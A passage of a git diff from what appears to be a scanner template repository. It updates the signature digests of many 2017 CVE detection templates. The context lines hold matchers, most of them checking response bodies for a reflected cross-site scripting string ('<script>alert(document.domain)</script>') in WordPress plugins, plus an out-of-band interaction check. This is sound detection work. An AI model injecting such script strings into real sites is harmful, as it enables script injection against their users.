a/http/cves/2017/CVE-2017-18496.yaml +++ b/http/cves/2017/CVE-2017-18496.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Htaccess by")' condition: and -# digest: 4a0a00473045022100d15d88b20dc2025c1222de29bcdcb7f8e8d30287102244dd47259b4709bdd539022074e861018f6c2c65de07cd24dab9c02ffea05aec9e96e88314e17857f73270eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206cebed1d2cfcbba886f3bb89acf666468d9abd47f636e8dcbab195de7bcedc5d02204b1a649f3eb5ccdbeaea8266f4fb5b82ce65cf8fa7d581a86302a6a500b9893b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18500.yaml b/http/cves/2017/CVE-2017-18500.yaml index 8d4a99c7c6..65202a6009 100644 --- a/http/cves/2017/CVE-2017-18500.yaml +++ b/http/cves/2017/CVE-2017-18500.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Social Buttons Pack by")' condition: and -# digest: 4a0a00473045022100e023710fd2cddcb7031ad7fba8662510eaeed9e5faafbd42d85dd970f2d8ee0202202366661999f0a17500a912412bd4d032a998c89376f68bf9607137adec9e75e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210097d2ba84eda3054b5bbf7ff6e09c950d1472e99f14f1363222b0100fe8faeb7302207885d27d9bb4d1300e2d67f44f7cfd5dd474403f79b456c86c6e97876e5e2346:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18501.yaml b/http/cves/2017/CVE-2017-18501.yaml index 7d692fbf75..56ff4d6858 100644 --- a/http/cves/2017/CVE-2017-18501.yaml +++ b/http/cves/2017/CVE-2017-18501.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Social Login by")' condition: and -# digest: 4b0a00483046022100b926cdd9c0ccc5dd9db56d2d1011d94f6bcb665e4215f9b90fc954268a35f671022100fa7f0cc871a66086020b70e8d3c2f1f862fe6497f6174e0101aa0c4c9b9bedd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a57b57e66eb384072150b5c6a840119397131570efa67a7f9c2e40d712e108a8022006dd891ccbe7310686e9fef74e5ef7c8e36a2636cb38ac1cf34bdbf780eee92d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18502.yaml b/http/cves/2017/CVE-2017-18502.yaml index 58762eefc6..51b287284b 100644 --- a/http/cves/2017/CVE-2017-18502.yaml +++ b/http/cves/2017/CVE-2017-18502.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Subscriber by")' condition: and -# digest: 490a0046304402206e4b864003dd64c21ddbc07de1eae42df292cce45d23b04ff0a705050c7d6fee022069151f539cdd3d0ffcc2d3de11e35b01a3f9d076a033bc2f9506cedef12a0431:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f7d15632ab8608bebbe97636df7a941eb29ba3f4012e1664edf568e71e0b616b022021f975e64e8083830d43231fa29398e32fe3a7e90079f8f7efc58beb5471d59b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18505.yaml b/http/cves/2017/CVE-2017-18505.yaml index 8886a3dcd5..c2987358e1 100644 --- a/http/cves/2017/CVE-2017-18505.yaml +++ b/http/cves/2017/CVE-2017-18505.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Twitter Button by")' condition: and -# digest: 490a00463044022100dcf0b1872f1e4b503b0af45ff58d2dd2d63f7c318e856f62fa9e9e737b583dcc021f756676a67d113a71da4ccd4e3136fc5299b660be6ff05f647b675444fe0f9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f5c1938441664f32ae5956e67cdeb722a5e451ed9dd2610860beda5af343c47802202dbf8097ea677f4060fc221409b73bc2477f534f193acb72991c2da8aede78a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18516.yaml b/http/cves/2017/CVE-2017-18516.yaml index 636ef7d3ee..0761257e06 100644 --- a/http/cves/2017/CVE-2017-18516.yaml +++ b/http/cves/2017/CVE-2017-18516.yaml @@ -54,4 +54,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "LinkedIn by BestWebSoft")' condition: and -# digest: 490a00463044022029e324ae86078771f7966a269328bfcbcbe6936a0ea4be26a3aa7d464e03985102206feb41aa4ca49f348a755fb8128515520fe3d45f4979f4fb8bf5ce642b8039a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100de73b829433dc9021aec272db32b7414d70a25a6a8c5460a5b2889af85d2d7f102203859644f40022a8ab83f4f8d96d3f5922780fd1bc94983b82284b04bee1c2045:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18517.yaml b/http/cves/2017/CVE-2017-18517.yaml index 4fdcb69d18..e2c9f204cc 100644 --- a/http/cves/2017/CVE-2017-18517.yaml +++ b/http/cves/2017/CVE-2017-18517.yaml @@ -54,4 +54,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Pinterest by BestWebSoft")' condition: and -# digest: 4b0a00483046022100f42861bb6943a4d15b0b1d3395e4e7bd35611f410bbe8966b3fbcc368a0981b1022100e9ae78c33f21aa32aef0a555d60f034ddaa95205574bcbdd225cdfa87253bd89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009784298525357d1b2864c132ae0a0abb38cc1462b72e9e2be45350fe80d52583022100e1dc4efd37ce072b4d7b929721fd53c927b04660f45c21977911db02b4f50c28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18518.yaml b/http/cves/2017/CVE-2017-18518.yaml index 9d289105ba..8abcf319a7 100644 --- a/http/cves/2017/CVE-2017-18518.yaml +++ b/http/cves/2017/CVE-2017-18518.yaml @@ -54,4 +54,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "SMTP by BestWebSoft")' condition: and -# digest: 490a0046304402207ea1156bb7aca36c6c5f6c4b32a5da0dd2a371d79ef01efc1f617333ca8ea40102200af36b5bdce7f177e9470a66b8d7efc415ba18d72c902af7e624a870db782b89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203619a6bded48a49cb312df0a7d9cca61a3832299a1647cfd152a834ae9f1281c022100a526ecf0569c6f2d5c81278d6441b2f0a89c773c547695a429994388fc0fbf7c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18527.yaml b/http/cves/2017/CVE-2017-18527.yaml index a49da0c75b..ad3dc71044 100644 --- a/http/cves/2017/CVE-2017-18527.yaml +++ b/http/cves/2017/CVE-2017-18527.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Pagination by BestWebSoft")' condition: and -# digest: 4b0a00483046022100c217cf6634e20882d3d3c5617089a1d6c93945b233f5793c195bb2d7efcdcb2b0221008e821f6cbd160c00a7f0cf3c32fbd0668e25537e0400c293d97280ef0bbd9585:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100feff368a0cdd9a49edd3b0b5d5173703c49eccce649db0cd5ee1592f86e02829022100948e666a38ab177ef10ac2bbdca68dc637c9f000be8096693cb36e3bc1496873:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18528.yaml b/http/cves/2017/CVE-2017-18528.yaml index b6c6f6f9c0..aa10dbf145 100644 --- a/http/cves/2017/CVE-2017-18528.yaml +++ b/http/cves/2017/CVE-2017-18528.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "PDF & Print by BestWebSoft")' condition: and -# digest: 490a0046304402200f2fb28a6fe0f4e727facb4c87f8183d1c05d941bc0c2f181108a7196c99f7850220083b85ba8d55c0817511ea3f1ed08a03e9f474c8c0849d351db0352bb7d98241:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207ed65a94dc92a061051f438d1678d744cd221e59c78a6b9245d2bb046fe46d0b0220285a1de29f9ab0a109640a034f0e7271d50ef354659548698cbdb8b550c22a97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18529.yaml b/http/cves/2017/CVE-2017-18529.yaml index 1a2b06a0c6..b616f3a683 100644 --- a/http/cves/2017/CVE-2017-18529.yaml +++ b/http/cves/2017/CVE-2017-18529.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "PromoBar by BestWebSoft")' condition: and -# digest: 4a0a00473045022100dce2ddd796dc445298de0b036569d53a793dc981ca120153d192393eb4138b91022040b10fd80423f88a9e0bcfe1ba0dbb1621e43a2d2125149840e3524072ed75db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bec59508977cb56db530d49037132274e613a3a2132e1a709934737d7f937c8b02203096247c5a7b011c3f8ac126777b3632dd959c07a6ddfae10913120293afce55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18530.yaml b/http/cves/2017/CVE-2017-18530.yaml index 94ebe90e6e..8ed1cf7458 100644 --- a/http/cves/2017/CVE-2017-18530.yaml +++ b/http/cves/2017/CVE-2017-18530.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Rating by BestWebSoft")' condition: and -# digest: 4a0a00473045022100d14387bb807d60d92965e154331ac1f4dcf45276ab31045f5fa4aff1a4ad56f502205ec3a2018588e6e9fd95843db0d597aefa6494fcb532e57cf85856ad6081046f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210091d8aac6a707f173c291302675374aa0d10f520b5c55af53dd46b367bbbddad602204382953b0ec8e5756a2b9463836ff893ad60a694779540f84999a47e50450d1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18532.yaml b/http/cves/2017/CVE-2017-18532.yaml index 5817f23708..79f0c5cadf 100644 --- a/http/cves/2017/CVE-2017-18532.yaml +++ b/http/cves/2017/CVE-2017-18532.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Realty by BestWebSoft")' condition: and -# digest: 4a0a00473045022055f7184ddba40ff8bc048f5fde8113756fd30099586ffa5b9de186dd6a8498e20221008eff9c034c2b21f9f1086faaa85dfa1e220a4f802f772f45005325021daa14a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022020e456320394136770d7b6a23fdb9d21f0af1f8fc601122bc231982ffa0472f00220265606c9cbc35d1151fd6148ade06a74ee53a90fdf6c12f33d00ab08e339dce0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18537.yaml b/http/cves/2017/CVE-2017-18537.yaml index c616e93cc7..375bbabcdf 100644 --- a/http/cves/2017/CVE-2017-18537.yaml +++ b/http/cves/2017/CVE-2017-18537.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Visitors Online by")' condition: and -# digest: 4a0a00473045022100b1b8b53832c640443927a239b59a693a670b9bfc237cb699ba61b223cb8a652c022041096691678b98e9fcdf56d6d8535bb66cb180a08e91b26c5b46c3f4ce771c1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210097e05f20cb0afd081f129b36eb2758d1aa244bf0617bef586964eb3031f0c4f9022100dce185e320545c24e802d4dd695d9e2cfba3a387b8de48241d828a3a5b80b478:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18542.yaml b/http/cves/2017/CVE-2017-18542.yaml index 79165bcafe..e72bfeef0f 100644 --- a/http/cves/2017/CVE-2017-18542.yaml +++ b/http/cves/2017/CVE-2017-18542.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Zendesk Help Center by BestWebSoft")' condition: and -# digest: 4b0a00483046022100a642d73b44074f3bbdf0efaccd2848c1c08663433c85afb0b7c479451a28fc9402210099b949219f2bc734a1a37836c79d73c465a52c7d36281dc1509ff0731b6fe843:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022064b6b4da3715e1cd54ebe4c590fe066f88e1afa074bf62596f6b2c4c093bb185022019b68f9bf0cec36c4c3befc1afdded4713daac91435a3ab8b873d0dc233fa992:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18556.yaml b/http/cves/2017/CVE-2017-18556.yaml index 6404cd0920..d66ee50b85 100644 --- a/http/cves/2017/CVE-2017-18556.yaml +++ b/http/cves/2017/CVE-2017-18556.yaml @@ -54,4 +54,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Google Analytics by BestWebSoft")' condition: and -# digest: 4b0a00483046022100fe01c932c0e4cb28aaa09be35931901def6da9156423788f1273ce95ec25383e022100881310859f0fe8598816e9dd175b53807394c4e2606f0e34eaa6a4520c858649:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f1d8dff14b510f9f76ca38b26ce1576d6fa9d581a219f4b0de8e9d69c0e1ca790221008ff36e7393e2e657a067c86ce074b2b43daef945d13218e20a25e1f662311311:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18557.yaml b/http/cves/2017/CVE-2017-18557.yaml index 775237fe4d..a3d4684b99 100644 --- a/http/cves/2017/CVE-2017-18557.yaml +++ b/http/cves/2017/CVE-2017-18557.yaml @@ -54,4 +54,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Google Maps by BestWebSoft")' condition: and -# digest: 4a0a00473045022100ed1b6c5d04f21c78e943b4993d472189e36df1733dc10800b62deca1bc6c18d2022014f77ec4de6a90b2c095c1dbdc5bb61e93e03eb6f5f3ecd1ec60f9703ee2e024:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cd32ef8ce244009ee4a5dd2d3ab51a1d38d23cb75bdf7356bf42d8e3a0e39249022004f072b84e4296ab5506a996081bce336a98567e2fa50f62b220888ca5da6844:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18558.yaml b/http/cves/2017/CVE-2017-18558.yaml index 570d868792..a1a81a8923 100644 --- a/http/cves/2017/CVE-2017-18558.yaml +++ b/http/cves/2017/CVE-2017-18558.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Testimonials by BestWebSoft")' condition: and -# digest: 4b0a00483046022100b857ebe6869ee45f7dc4cff92ae7682a95b98286296b23281f2dfbdf01999732022100f8f5b927297f1d44346317dcd9659352a25a45199675628023f765a3d6a6cc22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f7de515c52e7cccf2e9c8583a2b96019185e53673e9523e5f5b6cc30872f67c4022077c8a0a13614b8843fd0affccba2ccf2af9942fa0ba8f208a03c114120640a79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18562.yaml b/http/cves/2017/CVE-2017-18562.yaml index f57c3e4035..b1fa1d44ee 100644 --- a/http/cves/2017/CVE-2017-18562.yaml +++ b/http/cves/2017/CVE-2017-18562.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Error Log Viewer by BestWebSoft")' condition: and -# digest: 4b0a00483046022100cd3c538f6d53984acdce0e66fef97e1081a643dbb6921d756ebc88c5d4d2a65c022100ca84221f6ec3d788ebc71c032d4ece39ecca89429e9630d41c52dd3f169021c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b49b5546c5e356ed090a5baa16111876c4c991b69c5dc67046b81a2ad108879a022100d453b82a07de52435050cab4b3efd7c6117b6ed887ca1e6b6ce7dbc98fd99230:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18564.yaml b/http/cves/2017/CVE-2017-18564.yaml index 045337c09f..b0c44b6c2f 100644 --- a/http/cves/2017/CVE-2017-18564.yaml +++ b/http/cves/2017/CVE-2017-18564.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Sender by BestWebSoft")' condition: and -# digest: 4a0a0047304502203c10e42cf8c927b6c89715593cbc44a0eb7d70415e077c7cefc813541abfac28022100f611a234592239a4f01327dce894478ed0b4fba7ad216909b3e8166758c90381:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203d7b910fbb597d244b1ea4ccd7d651abea88be36087caab1e0acfda7ce34b94c02203a1f52d4311fe05cbe69ec2e8ad15bdd999b037254222c69de4bc8144edfe40a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18565.yaml b/http/cves/2017/CVE-2017-18565.yaml index 17dfdf8400..74ff166257 100644 --- a/http/cves/2017/CVE-2017-18565.yaml +++ b/http/cves/2017/CVE-2017-18565.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Updater by BestWebSoft")' condition: and -# digest: 4a0a00473045022100f088907da44a2cfd70389dfaf174e89311d92a1172ac70a3c54dc21e056b198602205c275024f4e29ef71f7a5391b3e006873b4244b1eed2b06005d39186225cb401:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022038b686e39461befca7d2bc4f8f78d0dc75e69d84ef8c4056ac5e34fad2f974e702203b13411d7ba9f49d6fdf88f3df351015546d243e5774fea755d55c5623a859e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18566.yaml b/http/cves/2017/CVE-2017-18566.yaml index ca26e14aab..167c9ffdd4 100644 --- a/http/cves/2017/CVE-2017-18566.yaml +++ b/http/cves/2017/CVE-2017-18566.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "User Role by BestWebSoft")' condition: and -# digest: 4a0a00473045022100adad73e4ddbb122f6a74cd2eabb9fdba00f971d35e4fe0f330cd9489c8a85c220220035d45b55c8be488ed39701890033e2b69d9920dfcb71614149d760df5788bc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e2964e3ac4a9459594ff524255c05de5947d7b4273e3e440dc7d7e523de9927202200245b68ce01c7a285508761d463bca02f818233aa3d234d8a907ca3e7d0df75a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18598.yaml b/http/cves/2017/CVE-2017-18598.yaml index 5ff6843e4a..af69cc9176 100644 --- a/http/cves/2017/CVE-2017-18598.yaml +++ b/http/cves/2017/CVE-2017-18598.yaml @@ -58,4 +58,4 @@ http: part: body words: - "console.log" -# digest: 4a0a00473045022051e9027e449edff73649c81fe3cdba7ea4987a418a629a8b42e46524a18db753022100fcab7edcab8e705beea02220885aaa95c1084399834295982ccc23d902f9795e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d961b089a63d45d6ed79318ecc950215ff98fbf47d84e9c48af4d81d4e5196c30221009f486cc6e72e6d1e1ba532d4b7730d9d6a92a246b4c4e071ae3b2a69d195e829:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-3506.yaml b/http/cves/2017/CVE-2017-3506.yaml index c54195e14d..704a9d2e04 100644 --- a/http/cves/2017/CVE-2017-3506.yaml +++ b/http/cves/2017/CVE-2017-3506.yaml @@ -63,4 +63,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a00473045022100878940581311a5d9587aba613294a182d8de4a03d087fde8f3eb14269d7b253d02206ea04fe2355b669325164543d5b02337f05eccde9b61657d31142cd642735208:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022050af26b86c7352e010d4c1bb210c592ab517c353a3a278fee1e2a88f7884f639022100a897daf2889e7890582d81e9978861aa625d15e1e8966cca13e17fcd24e90d24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5521.yaml b/http/cves/2017/CVE-2017-5521.yaml index b717a27875..84d9a8d22f 100644 --- a/http/cves/2017/CVE-2017-5521.yaml +++ b/http/cves/2017/CVE-2017-5521.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220475cf79bbd6db0830e43542783b81874242bece61820a7894f583371748f015b02207aa0881723c78483cb50b459bbd5dda2b2da88f94190c04e6c6f5526498b7b3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022059065c5c9ba92a40e10293914467e7965bbb2954d0bb893d401c3154c1d6eb5d022100b85fa32ba119c6b5a80ed29385a4e05c8c072b17d9dd11e9812bd4a8974b0953:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5638.yaml b/http/cves/2017/CVE-2017-5638.yaml index 1697fe4b00..4b029a8de1 100644 --- a/http/cves/2017/CVE-2017-5638.yaml +++ b/http/cves/2017/CVE-2017-5638.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204804f37982a6760d4e6547fa3508c53ef48322c15d3d9512e50a4fc96c88ce3f022100fe1c4fa3553083679aad75f77fd4f611edbe82fa0717876a4a5781a654f3a057:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100abf34bde000320ae4e9c1d41b55199b292cda0a25e76520dbbd0fb79fdc188c5022100b6cb3b2918088f18956ef2d5bef585397d1d187a42df64a8f428694357252bb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5689.yaml b/http/cves/2017/CVE-2017-5689.yaml index 77e5374c5a..9f0b20b28f 100644 --- a/http/cves/2017/CVE-2017-5689.yaml +++ b/http/cves/2017/CVE-2017-5689.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b00287c7a2a6ba526529b8d990b528ce377af16295c124a967356a08b6430f4202206dc31566afe6ca3dfcf7fbc70171e24f3e2c63902bdc59d568de62e08eafb897:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ae7d986daa94e8b737d413b411866526197e7ed9ee7c05b29e23a4639988c5b6022100bbfb016406072dfabfdae4b9a0d3db56a1d54283a4b723453bb6ca0a0e322224:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-6090.yaml b/http/cves/2017/CVE-2017-6090.yaml index dbbb5b8d1c..f36b30eb81 100644 --- a/http/cves/2017/CVE-2017-6090.yaml +++ b/http/cves/2017/CVE-2017-6090.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022024a8d29d33fa8252530cbb7f2948713c26ecce98344c9a9d976f12567408150c022100927252f4dcd48268d836e6b9155ee52daf04b3fcc9fc99e7a554874a57741681:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e3eccf8a8a7a6d8147aa5fd22a5cc4544f16063db9ba7f74116c6e413b6eddb7022100c8d71b9c1e63500b46e4c6c242fb2e5b9a3109b8d9c234c70c5f729ce7446138:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7615.yaml b/http/cves/2017/CVE-2017-7615.yaml index e78e97079e..6024c716e0 100644 --- a/http/cves/2017/CVE-2017-7615.yaml +++ b/http/cves/2017/CVE-2017-7615.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220158ca09ea384b1142ffa017940e328ef386bdf182bf063fa9cb058e9a9cb2b57022007c4d73a6544306d7581302f859a7724c44a9660e8374f67d47e3ec98208df3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022041805e05c3c9b623e1cf11a4a911cf78525f1ef192d5e1e7f48e013de771aa2e022100c10781e737c1f71f4d7924d4392097b6b4eba984a0afb52f0595caf908e204b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-7855.yaml b/http/cves/2017/CVE-2017-7855.yaml index 81b9d7671d..7ec10265b6 100644 --- a/http/cves/2017/CVE-2017-7855.yaml +++ b/http/cves/2017/CVE-2017-7855.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210096b16c5bc06532125db7042b4a42f48e1284d769136ba0ff69a0b0938ede6d12022100cafa979697e2e675dc8f09112269314d9b7262d802b971342f4a6f336ac9b9d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b56c8f008cfed93fbc36ea1e427b0b09bed2075d53ba1c7897cd03da17fb324602203b314ea3d40bb63c65979c2cdde9eab07028c301021cf5c1d7e23239ca4f51c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-8229.yaml b/http/cves/2017/CVE-2017-8229.yaml index ba79e02b15..ae983d9f82 100644 --- a/http/cves/2017/CVE-2017-8229.yaml +++ b/http/cves/2017/CVE-2017-8229.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b6fd9d1debb3a00599d529ed9870adb5c6425994cafe24875150518f3a770549022010a916473eeea40a72614d21ce4acd2715c401e4e6bd33fd9bdf6440eac4788d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c000631a0c97636538dc8e4fbca4baf666978b4bba64636814f5435ea5c89dc502206c941fddb497b4594fee41ef719d28299f1198960ade04faf4ead19ac181b3bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-8917.yaml b/http/cves/2017/CVE-2017-8917.yaml index 83e0ef0cc5..b69502d556 100644 --- a/http/cves/2017/CVE-2017-8917.yaml +++ b/http/cves/2017/CVE-2017-8917.yaml @@ -49,4 +49,4 @@ http: part: body words: - '{{md5(num)}}' -# digest: 490a004630440220337c1a3d26746ee57aa8f2c45501e6031aff3aaeb6755d63a78d80d6bacba95f0220189d68a3a43e09495d3dcee847b6c11e956d2a63eb2ada3ff898d3c6d2a01dc9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009a030884fea5b5b41a56e0efaca3477b0e5ee0c879e97b73a7bf3e967ec417100220260e50277cdd74a84133933a2063af90d82978303266b17cb0f061613ccfbb21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9288.yaml b/http/cves/2017/CVE-2017-9288.yaml index e98f690265..5ec10a89fd 100644 --- a/http/cves/2017/CVE-2017-9288.yaml +++ b/http/cves/2017/CVE-2017-9288.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009a5bb9d6ed82d7766d04e93226e4ab9aaacc265ab8feee1621e74ecd4b7fb76e022100aea36e48ce640598175ed79b106073b46b52ac7bacff32398f09dfbb02f8d5ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dadcf9234046ee2489dc0606a075f94773767dc3372e81c6da133580af06991602203f9a76992f5703e2164107795c1686ae2772cf9270119b06b630b3f13c6833e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9416.yaml b/http/cves/2017/CVE-2017-9416.yaml index b3385320e0..813a174416 100644 --- a/http/cves/2017/CVE-2017-9416.yaml +++ b/http/cves/2017/CVE-2017-9416.yaml @@ -56,4 +56,4 @@ http: - "contains(body, 'extensions')" - "status_code == 200" condition: and -# digest: 490a0046304402200ae1062b4d18e3bae8f1c1d9f3200e04c5d570c18548cb5416cca0a21ff2784d022017b86827595b36926951acc817a2da6dad10db2aeaf57e2bb88093764f8b572b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008c115e718d85457df3f04a77cdf612a8a6e44b1a73e97bf8cd5b7b8cb9c7a4f602201566150bfed49300f3c98e4c961c6f0ccb37ad3757ea3229129cbb69f63ae0bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-9506.yaml b/http/cves/2017/CVE-2017-9506.yaml index 